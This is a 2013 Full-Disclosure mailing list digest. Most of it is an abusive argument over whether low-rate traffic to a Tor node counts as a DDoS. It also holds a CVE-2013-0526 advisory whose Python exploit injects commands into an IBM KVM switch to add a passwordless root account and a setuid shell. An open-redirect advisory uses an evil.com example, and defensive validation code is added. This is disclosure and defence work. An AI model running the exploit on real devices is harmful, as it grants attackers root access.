Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Daniel Preussker
+1


Daniel Preussker

[ Research and Engineering
[ dan...@preussker.net
[ http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x87E736968E490AA1

On 16.08.2013, at 23:49, adam wrote:

> Jann, you know what's even worse than someone being a dick for no
> reason? Someone being a _stupid_ dick for no reason. In case you're
> unaware, the word "massive" was completely absent from this thread
> until YOU attempted to put it in someone else's mouth. Beyond that,
> since you want to rip apart an innocent guy's post, let's see what
> happens when someone does it to yours.
> 
> "DDoS? So you mean your systems were impacted by that?"
> 
> Impacted is not the word you were looking for, since the answer to
> that would technically be a yes - not the no you were expecting. That
> aside, a denial of service attack is still a denial of service attack
> regardless of whether it succeeds or not. In fact, if you look up the
> definition - you'll see that it's _an attempt_ to make X unavailable.
> Not necessarily a successful one.
> 
> "Let me google that for you. Hmm. Assigned to "Polipo Web proxy"."
> 
> Psst.. you may want to read the entire thread title.
> 
> "Oooh, a storm!"
> 
> storm
> Verb
> Move angrily or forcefully in a specified direction: "she stormed off".
> 
> Whether you like it or not, it meets the definition.
> 
> "Your systems were impacted by a DoS attack with 30 packets per
> second? You might
> want to upgrade to hardware that is a few decades newer."
> 
> How much of the original post did you actually read? Nowhere in it did
> the OP say that this attack succeeded. Again, just like above - YOU
> are the one who first used the word impact[ed]. It's funny how you put
> words in people's mouths, and then reply to them as though they
> actually said it. More than that, the only thing the OP mentioned was
> that one of his log files was corrupted in the process of the attack.
> I didn't read that the attack succeeded, shut down the service, his
> machine, his network or anything else - and neither did you.
> 
> "You were attacked by "O=TCP SPT=2216"? Cool story."
> 
> Oh my God, there was a line in there that didn't have an IP address?
> What a RETARD the OP must be. How can anyone be so stupid? I bet the
> earth stopped spinning when that happened. Think so?
> 
> "He said above 30 packets per second, right? I'll just assume it's around 30.
> And the sample packet from that "packet storm" contained this part: "LEN=52".
> So that's around 1500 bytes per second, or 12 kilobits per second. And those
> packets are downstream for him."
> 
> You're randomly assuming that all of the packets were the exact same
> length, which makes anything derived from that assumption
> automatically flawed.
> 
> "A good modem connection can give you up to 56kbit/s per direction as far as I
> understand."
> 
> You've never used dialup, have you? What you're saying is that "good
> modems" (what exactly is a bad modem?) get 7KB/s down and 7KB/s up -
> that is completely untrue. It's a lot closer to 5KB/s down (if you're
> lucky) and 2KB/s up. Aside from all of this, again, I reiterate that
> you have no idea what size the other 19,044 packets were. Anyway, yes
> - if your assumption were correct (52*19045 through a 56k modem) then
> it'd take only a few minutes to download all of the data (which
> doesn't even total a meg).
> 
> HOWEVER, there are still a multitude of things wrong with your entire
> stance. Firstly, bandwidth exhaustion is NOT the only way to perform a
> denial of service. In fact, in my opinion, it should be the last
> resort. There are much much better ways to do it, depending on the
> service being targeted. For example, some popular multiplayer games
> can be brought down with a single packet. Some can be kept down with
> that single packet, others require one group of packets to be kept
> down, and then some others require that one packet every X minutes. I
> use game servers only as an example.
> 
> If his log becoming corrupted was intentional, then it's entirely
> possible that the point of the attack wasn't to exhaust bandwidth but
> to crash the actual server application (or worse, exploit it in a way
> that can lead to remote access). No matter what the case though,
> almost every one of your points has been based on seemingly random
> (and likely inapplicable) assumptions you've made. So on top of coming
> across as a prick, you're also coming across as a clueless prick. And
> for no reason whatsoever.
> 
> Way to go.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 




Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Stefan Jon Silverman
+1

Regards,
Stefan

On 8/16/2013 2:49 PM, adam wrote:

> Jann, you know what's even worse than someone being a dick for no
> reason? Someone being a _stupid_ dick for no reason. In case you're
> unaware, the word "massive" was completely absent from this thread
> until YOU attempted to put it in someone else's mouth. Beyond that,
> since you want to rip apart an innocent guy's post, let's see what
> happens when someone does it to yours.
>
> "DDoS? So you mean your systems were impacted by that?"
>
> Impacted is not the word you were looking for, since the answer to
> that would technically be a yes - not the no you were expecting. That
> aside, a denial of service attack is still a denial of service attack
> regardless of whether it succeeds or not. In fact, if you look up the
> definition - you'll see that it's _an attempt_ to make X unavailable.
> Not necessarily a successful one.
>
> "Let me google that for you. Hmm. Assigned to "Polipo Web proxy"."
>
> Psst.. you may want to read the entire thread title.
>
> "Oooh, a storm!"
>
> storm
> Verb
> Move angrily or forcefully in a specified direction: "she stormed off".
>
> Whether you like it or not, it meets the definition.
>
> "Your systems were impacted by a DoS attack with 30 packets per
> second? You might
> want to upgrade to hardware that is a few decades newer."
>
> How much of the original post did you actually read? Nowhere in it did
> the OP say that this attack succeeded. Again, just like above - YOU
> are the one who first used the word impact[ed]. It's funny how you put
> words in people's mouths, and then reply to them as though they
> actually said it. More than that, the only thing the OP mentioned was
> that one of his log files was corrupted in the process of the attack.
> I didn't read that the attack succeeded, shut down the service, his
> machine, his network or anything else - and neither did you.
>
> "You were attacked by "O=TCP SPT=2216"? Cool story."
>
> Oh my God, there was a line in there that didn't have an IP address?
> What a RETARD the OP must be. How can anyone be so stupid? I bet the
> earth stopped spinning when that happened. Think so?
>
> "He said above 30 packets per second, right? I'll just assume it's around 30.
> And the sample packet from that "packet storm" contained this part: "LEN=52".
> So that's around 1500 bytes per second, or 12 kilobits per second. And those
> packets are downstream for him."
>
> You're randomly assuming that all of the packets were the exact same
> length, which makes anything derived from that assumption
> automatically flawed.
>
> "A good modem connection can give you up to 56kbit/s per direction as far as I
> understand."
>
> You've never used dialup, have you? What you're saying is that "good
> modems" (what exactly is a bad modem?) get 7KB/s down and 7KB/s up -
> that is completely untrue. It's a lot closer to 5KB/s down (if you're
> lucky) and 2KB/s up. Aside from all of this, again, I reiterate that
> you have no idea what size the other 19,044 packets were. Anyway, yes
> - if your assumption were correct (52*19045 through a 56k modem) then
> it'd take only a few minutes to download all of the data (which
> doesn't even total a meg).
>
> HOWEVER, there are still a multitude of things wrong with your entire
> stance. Firstly, bandwidth exhaustion is NOT the only way to perform a
> denial of service. In fact, in my opinion, it should be the last
> resort. There are much much better ways to do it, depending on the
> service being targeted. For example, some popular multiplayer games
> can be brought down with a single packet. Some can be kept down with
> that single packet, others require one group of packets to be kept
> down, and then some others require that one packet every X minutes. I
> use game servers only as an example.
>
> If his log becoming corrupted was intentional, then it's entirely
> possible that the point of the attack wasn't to exhaust bandwidth but
> to crash the actual server application (or worse, exploit it in a way
> that can lead to remote access). No matter what the case though,
> almost every one of your points has been based on seemingly random
> (and likely inapplicable) assumptions you've made. So on top of coming
> across as a prick, you're also coming across as a clueless prick. And
> for no reason whatsoever.
>
> Way to go.

Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread adam
Jann, you know what's even worse than someone being a dick for no
reason? Someone being a _stupid_ dick for no reason. In case you're
unaware, the word "massive" was completely absent from this thread
until YOU attempted to put it in someone else's mouth. Beyond that,
since you want to rip apart an innocent guy's post, let's see what
happens when someone does it to yours.

"DDoS? So you mean your systems were impacted by that?"

Impacted is not the word you were looking for, since the answer to
that would technically be a yes - not the no you were expecting. That
aside, a denial of service attack is still a denial of service attack
regardless of whether it succeeds or not. In fact, if you look up the
definition - you'll see that it's _an attempt_ to make X unavailable.
Not necessarily a successful one.

"Let me google that for you. Hmm. Assigned to "Polipo Web proxy"."

Psst.. you may want to read the entire thread title.

"Oooh, a storm!"

storm
Verb
Move angrily or forcefully in a specified direction: "she stormed off".

Whether you like it or not, it meets the definition.

"Your systems were impacted by a DoS attack with 30 packets per
second? You might
want to upgrade to hardware that is a few decades newer."

How much of the original post did you actually read? Nowhere in it did
the OP say that this attack succeeded. Again, just like above - YOU
are the one who first used the word impact[ed]. It's funny how you put
words in people's mouths, and then reply to them as though they
actually said it. More than that, the only thing the OP mentioned was
that one of his log files was corrupted in the process of the attack.
I didn't read that the attack succeeded, shut down the service, his
machine, his network or anything else - and neither did you.

"You were attacked by "O=TCP SPT=2216"? Cool story."

Oh my God, there was a line in there that didn't have an IP address?
What a RETARD the OP must be. How can anyone be so stupid? I bet the
earth stopped spinning when that happened. Think so?

"He said above 30 packets per second, right? I'll just assume it's around 30.
And the sample packet from that "packet storm" contained this part: "LEN=52".
So that's around 1500 bytes per second, or 12 kilobits per second. And those
packets are downstream for him."

You're randomly assuming that all of the packets were the exact same
length, which makes anything derived from that assumption
automatically flawed.

"A good modem connection can give you up to 56kbit/s per direction as far as I
understand."

You've never used dialup, have you? What you're saying is that "good
modems" (what exactly is a bad modem?) get 7KB/s down and 7KB/s up -
that is completely untrue. It's a lot closer to 5KB/s down (if you're
lucky) and 2KB/s up. Aside from all of this, again, I reiterate that
you have no idea what size the other 19,044 packets were. Anyway, yes
- if your assumption were correct (52*19045 through a 56k modem) then
it'd take only a few minutes to download all of the data (which
doesn't even total a meg).

HOWEVER, there are still a multitude of things wrong with your entire
stance. Firstly, bandwidth exhaustion is NOT the only way to perform a
denial of service. In fact, in my opinion, it should be the last
resort. There are much much better ways to do it, depending on the
service being targeted. For example, some popular multiplayer games
can be brought down with a single packet. Some can be kept down with
that single packet, others require one group of packets to be kept
down, and then some others require that one packet every X minutes. I
use game servers only as an example.

If his log becoming corrupted was intentional, then it's entirely
possible that the point of the attack wasn't to exhaust bandwidth but
to crash the actual server application (or worse, exploit it in a way
that can lead to remote access). No matter what the case though,
almost every one of your points has been based on seemingly random
(and likely inapplicable) assumptions you've made. So on top of coming
across as a prick, you're also coming across as a clueless prick. And
for no reason whatsoever.

Way to go.



Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Jeffrey Walton
On Fri, Aug 16, 2013 at 4:30 PM, Jann Horn  wrote:
> On Fri, Aug 16, 2013 at 01:37:54PM -0400, Jeffrey Walton wrote:
>> On Fri, Aug 16, 2013 at 1:31 PM, Jann Horn  wrote:
>> > On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote:
>> >> Hello dear companions,
>> >>
>> >> Two days ago one of my tor exit nodes experienced something I'm now
>> >> calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all
>> >
>> > DDoS? So you mean your systems were impacted by that?
>> He may be running an exit node for the benefit of others on a low
>> bandwidth connection.
>>
>> Forgive me if you were joking with an old friend, or I missed something.
>
> Let's check how massive that "attack" is.
I didn't claim it was massive. I simply said he may be bandwidth limited.

What other traffic is on that line? Or do all Tor folks purchase a
second internet connection for their Tor services?

Jeff



Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Jann Horn
On Fri, Aug 16, 2013 at 01:37:54PM -0400, Jeffrey Walton wrote:
> On Fri, Aug 16, 2013 at 1:31 PM, Jann Horn  wrote:
> > On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote:
> >> Hello dear companions,
> >>
> >> Two days ago one of my tor exit nodes experienced something I'm now
> >> calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all
> >
> > DDoS? So you mean your systems were impacted by that?
> He may be running an exit node for the benefit of others on a low
> bandwidth connection.
> 
> Forgive me if you were joking with an old friend, or I missed something.

Let's check how massive that "attack" is.

He said above 30 packets per second, right? I'll just assume it's around 30.
And the sample packet from that "packet storm" contained this part: "LEN=52".
So that's around 1500 bytes per second, or 12 kilobits per second. And those
packets are downstream for him.

Now take a look at .
A good modem connection can give you up to 56kbit/s per direction as far as I
understand. So unless I made some weird calculation errors, someone on a good
modem connection should be able to take that "attack" without any problems.

An "attack" from one (!) bot on a normal DSL line should already be much bigger.

Calling this a DoS attack would be ridiculous, calling it a DDoS even more so.

(Of course, it might still be that he really was hacked and his systems were
attacked in a smarter way, but it's very clear that nobody tried to take him
out with pure bandwidth.)



[Full-disclosure] CVE-2013-0526 IBM GCM16/32 Remote Command Execution.

2013-08-16 Thread Alejandro Alvarez
I. Product description

The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance.


II. Vulnerability information

Impact: Command execution
Remotely exploitable: yes
CVE: 2013-0526
CVSS Score: 8.5


III. Vulnerability details

GCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw
that allows a remote authenticated user to execute unauthorized commands as
root.

This flaw exists because webapp variables are not sanitised. In this case,
the parameters $count and $size from ping.php allow a specially crafted
URL to inject text into an exec() call, so it can be used to execute any
command on the KVM embedded Linux.


IV. Proof of concept

Following is a simple exploit that leads to root access to the device,
opening a telnet and creating a new user with root permission without
password (sessid and target are hardcoded so they must be changed to work):


#!/usr/bin/python

"""

This exploit for Avocent KVM switch allows to gain root access to embedded
device. SessionId (avctSessionId) is necessary for this to work, so you
need a valid user. Default user is "Admin" with blank password.

After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su - superb" to gain root

"""

from StringIO import StringIO
import pycurl
import re
sessid = "X"
target = "https://ip.of.kvm/ping.php"; 

command = "/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd ; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to device using telnet with user target and pass target, then \"/tmp/su - superb\""

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1 ; echo *E* ; ' + command + ' ; echo *E*')
c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try:
 c.perform()
 c.close()
except:
 print ""

content = storage.getvalue()
x1 = re.search(r"\*E\*(.*)\*E\*",content)
print x1.group(1).replace("","\n")


V. Vendor Response

IBM released a new firmware that corrects this vulnerability (1.20.0.22575)


VI. Timeline

2013-06-12 - Vendor (IBM PSIRT) notified.
2013-06-12 - Vendor assigns internal ID.
2013-07-02 - Vendor confirms the vulnerability.
2013-08-16 - Vulnerability disclosed and patch released.


VII. External information

Information about this vulnerability (in Spanish):
http://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html
IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509



-- 
--
Alejandro Alvarez Bravo
alex.a.br...@gmail.com
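
Added example, not part of the advisory and not IBM's or Avocent's code: the flaw class described in section III (form fields concatenated into a shell command) next to a hardened handler that validates each field and builds an argument vector for execution without a shell. The field names follow the POST body in the proof of concept; the function names, the numeric limits and the sample values are assumptions made for the illustration.

```python
import ipaddress
import re


class RejectedInput(ValueError):
    """A form field failed validation; nothing is executed."""


# ASCII digits only. \d would also match non-ASCII digits.
_DIGITS = re.compile(r"[0-9]{1,5}")


def shell_string_concat(form):
    """Flawed pattern: fields pasted into one shell string (built, never run)."""
    return "ping -c %s -s %s %s" % (form["count"], form["size"], form["address"])


def _bounded_int(form, name, low, high):
    raw = form.get(name, "")
    # fullmatch: the whole value must be digits, so "1 ; x" and "1\n" both fail.
    if not _DIGITS.fullmatch(raw):
        raise RejectedInput("%s: not a plain decimal integer" % name)
    value = int(raw)
    if not low <= value <= high:
        raise RejectedInput("%s: outside %d..%d" % (name, low, high))
    return value


def build_ping_argv(form):
    """Return an argv list suitable for subprocess.run(argv), i.e. no shell."""
    if form.get("action") != "ping":
        raise RejectedInput("action: unsupported")
    try:
        address = ipaddress.ip_address(form.get("address", ""))
    except ValueError:
        raise RejectedInput("address: not an IP literal")
    count = _bounded_int(form, "count", 1, 10)      # limits are assumptions
    size = _bounded_int(form, "size", 8, 1472)
    # Every element is rebuilt from a parsed value, never copied from the input.
    return ["ping", "-c", str(count), "-s", str(size), str(address)]


def is_rejected(form):
    try:
        build_ping_argv(form)
    except RejectedInput:
        return True
    return False


# Constructed inputs: one well-formed request and one carrying shell syntax
# in the count field, the position the advisory names.
GOOD = {"action": "ping", "address": "192.0.2.7", "size": "56", "count": "1"}
INJECTED = dict(GOOD, count="1 ; echo INJECTED")

if __name__ == "__main__":
    print(shell_string_concat(INJECTED))   # the shell would see a second command
    print(build_ping_argv(GOOD))
    print(is_rejected(INJECTED))
```

Validation and the no-shell argv are independent layers: either one alone stops this input, and keeping both means a later change to one does not reopen the hole.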

[Full-disclosure] t2'13: Challenge to be released 2013-09-07 10:00 EEST

2013-08-16 Thread Tomi Tuominen

It is that time of the year again - we’re pleased to announce the
release of the t2’13 Challenge!

Soon after t2’12 was over, we discovered that the conference had been 
infiltrated by an APT. Our best guess is that the APT pwned the laptop 
of one of the conference organizers and successfully exfiltrated some 
data. Luckily for us, our beloved APT got so hammered on the conference 
dinner on Thursday that he forgot his USB thumb drive to Zetor. We are 
confident that this OPSEC blunder will lead us to what was stolen but 
despite our best efforts we have not been able to decipher the contents 
of the USB drive. Your mission, should you choose to accept it, is to 
recover the stolen content.


The first person to recover all content will win a free ticket to 
t2’13 conference. In addition to this, the creators of the Challenge 
will select another winner among the next ten correct answers. The 
criteria for the other selection is the elegance of the answer. In 
short, you can win with both speed and style.


The t2’13 Challenge will be released 2013-09-07 10:00 EEST right here 
at http://t2.fi/


Good luck,

  T

pS. Seriously, this is even better than last year ;)

--
Tomi 'T' Tuominen | Founder @ t2 infosec conference | https://t2.fi


Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Jeffrey Walton
On Fri, Aug 16, 2013 at 1:31 PM, Jann Horn  wrote:
> On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote:
>> Hello dear companions,
>>
>> Two days ago one of my tor exit nodes experienced something I'm now
>> calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all
>
> DDoS? So you mean your systems were impacted by that?
He may be running an exit node for the benefit of others on a low
bandwidth connection.

Forgive me if you were joking with an old friend, or I missed something.

Jeff



Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Jann Horn
On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote:
> Hello dear companions,
> 
> Two days ago one of my tor exit nodes experienced something I'm now
> calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all

DDoS? So you mean your systems were impacted by that?


> packets in the storm were flowing from a range of 514 different IP
> addresses, all of them inside limestonenetworks IP range and targeting
> port 8123 on my tor exit node WAN IP.

Let me google that for you. Hmm. Assigned to "Polipo Web proxy". So maybe
someone tried to connect to them through your exit node and they do proxyscans
on people who connect to them?


> Before the packet storm,

Oooh, a storm!


> The attack persisted for at least three hours and left this binary (hex
> represented):
> 

Maybe your disk is just broken?


> Attached is the list of participating IP addresses, line by line, with
> the count of packets received. The attacker started sending something
> like 4 packets per second and increased to over than 9000!!! - just
> kidding, over 30 per second.


Your systems were impacted by a DoS attack with 30 packets per second? You might
want to upgrade to hardware that is a few decades newer.

> 74.63.255.118: 248 
> 216.245.193.201: 235 
> 208.115.232.205: 231 
> 74.63.255.119: 225 
> 216.245.193.200: 219
[...]
> O=TCP SPT=2216 : 1 

You were attacked by "O=TCP SPT=2216"? Cool story.
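
Added example, not part of any message in this thread: a tally of per-source packet counts, peak packets per second and average bit rate from kernel LOG lines in the format quoted above, which skips lines that have lost their timestamp or whose SRC is not an IP address instead of counting a fragment such as "O=TCP SPT=2216" as a source. The log lines are constructed (documentation address ranges), and the function names and the year passed to the timestamp parser are assumptions.

```python
import ipaddress
import re
from collections import Counter
from datetime import datetime

FIELD_RE = re.compile(r"\b([A-Z]+)=(\S*)")
STAMP_RE = re.compile(r"^([A-Z][a-z]{2} [ \d]\d \d{2}:\d{2}:\d{2}) ")

# Constructed sample lines. The last two are damaged on purpose: one has lost
# its beginning, the other its end.
_T = ("Aug 13 {t} host user.warn kernel: [hammer] : IN=vlan2 OUT= SRC={s} "
      "DST=198.51.100.1 LEN={n} TOS=0x00 PREC=0x00 TTL=48 ID=20269 DF PROTO=TCP "
      "SPT=1757 DPT={p} WINDOW=65535 RES=0x00 SYN URGP=0")
SAMPLE_LOG = "\n".join([
    _T.format(t="20:39:14", s="192.0.2.10", n=52, p=8123),
    _T.format(t="20:39:14", s="192.0.2.11", n=52, p=8123),
    _T.format(t="20:39:14", s="192.0.2.10", n=60, p=8123),
    _T.format(t="20:39:15", s="192.0.2.10", n=52, p=8123),
    _T.format(t="16:50:22", s="203.0.113.5", n=52, p=9001),   # other port
    "O=TCP SPT=2216 DPT=8123 WINDOW=65535 RES=0x00 SYN URGP=0",
    "Aug 13 20:39:16 host user.warn kernel: [hammer] : IN=vlan2 OUT= SRC=192.0.2",
])


def parse_line(line, year=2013):
    """Return a record for a well-formed LOG line, or None if it is damaged."""
    stamp = STAMP_RE.match(line)
    if not stamp:
        return None
    fields = dict(FIELD_RE.findall(line))
    try:
        # syslog timestamps carry no year, so one is supplied (assumption).
        when = datetime.strptime("%d %s" % (year, stamp.group(1)),
                                 "%Y %b %d %H:%M:%S")
        src = ipaddress.ip_address(fields["SRC"])
        return {"when": when, "src": str(src),
                "len": int(fields["LEN"]), "dpt": int(fields["DPT"])}
    except (KeyError, ValueError):
        return None


def summarize(text, port=8123):
    """Tally packets to `port`; damaged lines are reported, not counted."""
    per_src, per_second, rejected, total_bytes = Counter(), Counter(), [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            rejected.append(line)
            continue
        if rec["dpt"] != port:
            continue
        per_src[rec["src"]] += 1
        per_second[rec["when"]] += 1
        total_bytes += rec["len"]          # LEN is the IP total length
    if not per_second:
        return {"sources": {}, "packets": 0, "rejected": rejected,
                "peak_pps": 0, "avg_bits_per_s": 0.0}
    # Inclusive span in seconds between the first and last counted packet.
    span = (max(per_second) - min(per_second)).total_seconds() + 1
    return {"sources": dict(per_src), "packets": sum(per_src.values()),
            "rejected": rejected, "peak_pps": max(per_second.values()),
            "avg_bits_per_s": total_bytes * 8 / span}


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(key, value)
```

Summing the actual LEN of every counted packet avoids assuming one size for all of them, and the rejected list shows how much of the log was unusable.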



[Full-disclosure] Advisory: Unfuddle.com - Open Redirection

2013-08-16 Thread LIAD Mizrachi
Advisory: Unfuddle.com - Open Redirection
Author: Liad Mizrachi
Vendor URL: http://unfuddle.com
Status: Fixed



==
Vulnerability Description
==

Unfuddle offers a secure, hosted software project management environment.
When an unauthenticated user tries to access a resource on his site directly,
he will be redirected to a login page with the reference parameter set to
the resource location.

For Example:
Accessing: 
https://userSub.unfuddle.com/a%23/projects/1/
Will redirect the user to:
https://userSub.unfuddle.com/a#/session/new?reference=https%3A//mom3nt0.unfuddle.com/a%23/projects/1/

The redirection is not strictly to internal resources, but can also be used
to redirect users to an external site:
https://userSub.unfuddle.com/a#/session/new?reference=http://evil.com/
will redirect the user to http://evil.com after entering the correct
credentials in the login page.



==
Solution
==

Fixed by vendor


==
Disclosure Timeline
==

14-July-2013 - vendor informed
16-June-2013 - fixed


==
References
==

http://unfuddle.com
https://vimeo.com/72202542
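
Added example, not part of the advisory and not Unfuddle's code: one way to constrain a post-login redirect target such as the reference parameter described above, so that only same-site destinations are followed. The function name, the fallback path and the choice to allow only https on the default port are assumptions; the host names are the placeholders used in the advisory.

```python
from urllib.parse import urlsplit

SITE_HOST = "usersub.unfuddle.com"   # placeholder subdomain from the advisory


def safe_reference(reference, site_host=SITE_HOST, default="/"):
    """Return `reference` if it stays on `site_host`, otherwise `default`."""
    if not reference:
        return default
    # Browsers drop control characters and whitespace and treat "\" like "/",
    # so a value containing them may navigate somewhere the parser did not see.
    if "\\" in reference or any(ord(c) < 0x21 or ord(c) == 0x7F
                                for c in reference):
        return default
    try:
        parts = urlsplit(reference)
        port = parts.port            # raises ValueError on a malformed port
    except ValueError:
        return default
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept only an absolute path on this site.
        return reference if reference.startswith("/") else default
    if parts.scheme != "https":
        return default               # http:, javascript:, and "//host" forms
    if parts.username is not None or parts.password is not None:
        return default               # https://site@other-host/
    if parts.hostname != site_host.lower() or port not in (None, 443):
        return default
    return reference


# Constructed test values, already URL-decoded as a framework would hand them over.
CASES = {
    "https://userSub.unfuddle.com/a#/projects/1/": True,
    "/a#/projects/1/": True,
    "http://evil.com/": False,
    "//evil.com/": False,
    "https://userSub.unfuddle.com@evil.com/": False,
    "https://userSub.unfuddle.com.evil.com/": False,
    "/\\evil.com": False,
    "javascript:alert(1)": False,
    "https://userSub.unfuddle.com:8443/": False,
}


def check_cases():
    """Map each sample to True if it was accepted unchanged."""
    return {ref: safe_reference(ref) == ref for ref in CASES}


if __name__ == "__main__":
    for ref, accepted in check_cases().items():
        print("accept" if accepted else "reject", ref)
```

The comparison is made on the parsed hostname, not on a string prefix of the URL, which is what defeats the userinfo and look-alike-suffix forms.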

[Full-disclosure] JoinSEC London - October

2013-08-16 Thread Ralf Braga
About the JoinSEC London



Designed by Information Security professionals



The Information Security has been one of the most increasing concerns
worldwide. Everyday new attacks and counter attacks emerge, making it
impossible for professionals to keep themselves up to date.



The JoinSEC London (first edition) intends to convene busy IT and
Information Security Professionals with very little time to learn new
technologies or just deepen their knowledge on IT security tools and
techniques. With this in mind we gathered a group of hand picked
internationally renowned professionals to share their expertise with all
participants through training sessions and workshops.



We would like to invite the information security community to submit papers
and projects proposals.



All presentations and techniques presented and demonstrated during the
event, should be used to prevent and defense mechanisms, by industry,
technology professionals, academics, researchers, system administrators,
and other stakeholders.



Speakers will be given a 30 to 40 minutes slot, *except* for workshops or
training sessions.



Note: *If the speaker is not from the UK, the organization will try (it is not
guaranteed) to support some of the traveling expenses, but it will be
evaluated case by case.*



*When submitting a proposal, please include:*



   - Speaker name
   - Contact information (country/city of origin, e-mail, telephone number)
   - Presentation theme
   - Abstract/Presentation description (very simple)
   - Short Bio
   - Estimated length of presentation (30, 40 or more for training or
   workshop)
   - Macrotheme Based (Choose one below)


 Analysis of malicious code
 Anti-detection / Obfuscation techniques
 Anti-Forensics
 Botnet creation and detection
 Computer forensics
 Cryptography
 Data Recovery and Incident Response
 Exploit and vulnerability disclosure
 Firewall Evasion techniques
 Hacking GSM Networks
 Hardware Hacking
 Intrusion detection / prevention
 Malware analysis
 Malware conception
 Mobile Security (cellular technologies)
 Network scanning and analysis
 Opensource Security Technologies
 Physical security
 Protocol / Application based vulnerability exploitation
 Reverse engineering
 RFID Hacking
 Secure coding & code analysis
 Smartcard hacking
 Social engineering
 SPAM fighting
 Traffic analysis
 Virtualization attacks
 VoIP Hacking
 Web application vulnerability research
 Data Leak
 Wireless Security
 Zero Day Technology and techniques


Special attention: Purely commercial presentations and/or advertisement of
products/services will _not_ be accepted, only technical presentations.
Some commercial content may be tolerated if relativeirectly of a new
technology or methodology.


*Deadline:* papers/project proposal submission should be sent till the 31
of August 2013, to info(at)shadowsec(dot)com

Read more: 
http://www.joinsec.com/call-for-papers/

Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Bart van Tuil
Luther,

Is it just me, or is this ddos of 19045 packets in three hours a really, 
really sorry attempt at anything at all?? Even the peak of 30 pkts/sec
wouldn't really disrupt -any- service on a modern system, or disrupt any
self-respecting internet connection. I agree you shouldn't ignore the 
action by itself, but what was the actual damage?

Also, I am not clear about where you found this binary. Was it on your 
local fs? Was this just the content of the packages? If lfs, could the 
packet storm be nothing more than a distraction?

And at least 216.245.220.56 (one of the major participants); and by 
extension the rest in same subnet is not from limestone networks, and 
from far outside of USA.


I am very curious about the binary though :) if circumstance will 
allow me I'll take some time to look closer this weekend.


Happy hunting,

Bart


> -Original Message-
> From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk]
> On Behalf Of Luther Blissett
> Sent: donderdag 15 augustus 2013 22:30
> To: tor-relays
> Cc: full-disclosure@lists.grok.org.uk; ad...@limestonenetworks.com; tor-
> dev
> Subject: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS
> on polipo(8123)
> 
> Hello dear companions,
> 
> Two days ago one of my tor exit nodes experienced something I'm now
> calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all
> packets in the storm were flowing from a range of 514 different IP
> addresses, all of them inside limestonenetworks IP range and targeting
> port 8123 on my tor exit node WAN IP.
> 
> Before the packet storm, I could observe a huge increase on attempts to
> access my WAN domain through tor. I couldn't relate IP addresses from
> this first raise to those responsible for the actual packet storm nor
> could I identify some useful pattern there, but they were all coming
> from port 9001 and increased just some hours before the storm, so I'm
> guessing they are related somehow.
> 
> Also, throughout the storm, one of my log files got corrupted with some
> unreadable bin garbage. I do not know if it was intended/targeted
> exploit, but I'm reworking secrets and trying to figure out what is this
> binary.
> 
> Here is a sample line of a WAN attempt:
> 
> Aug 13 16:50:22 $USER user.warn kernel: [DROP INVALID WAN] : IN=vlan2
> OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx
> SRC=77.56.151.190 DST=xxx.xxx.xxx.xxx LEN=52 TOS=0x00 PREC=0x00 TTL=43
> ID=38787 DF PROTO=TCP SPT=40888 DPT=9001 SEQ=289854459 ACK=41163
> 
> Here is a sample line of packet storm:
> 
> Aug 13 20:39:14 $USER user.warn kernel: [hammer] : IN=vlan2 OUT=
> MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx
> SRC=74.63.216.60 DST=xxx.xxx.xxx.xxx LEN=52 TOS=0x00 PREC=0x00 TTL=48
> ID=20269 DF PROTO=TCP SPT=1757 DPT=8123 WINDOW=65535 RES=0x00 SYN URGP=0
> OP
> 
> The attack persisted for at least three hours and left this binary (hex
> represented):
> 
> 000        
> *
> b90       2067 3331
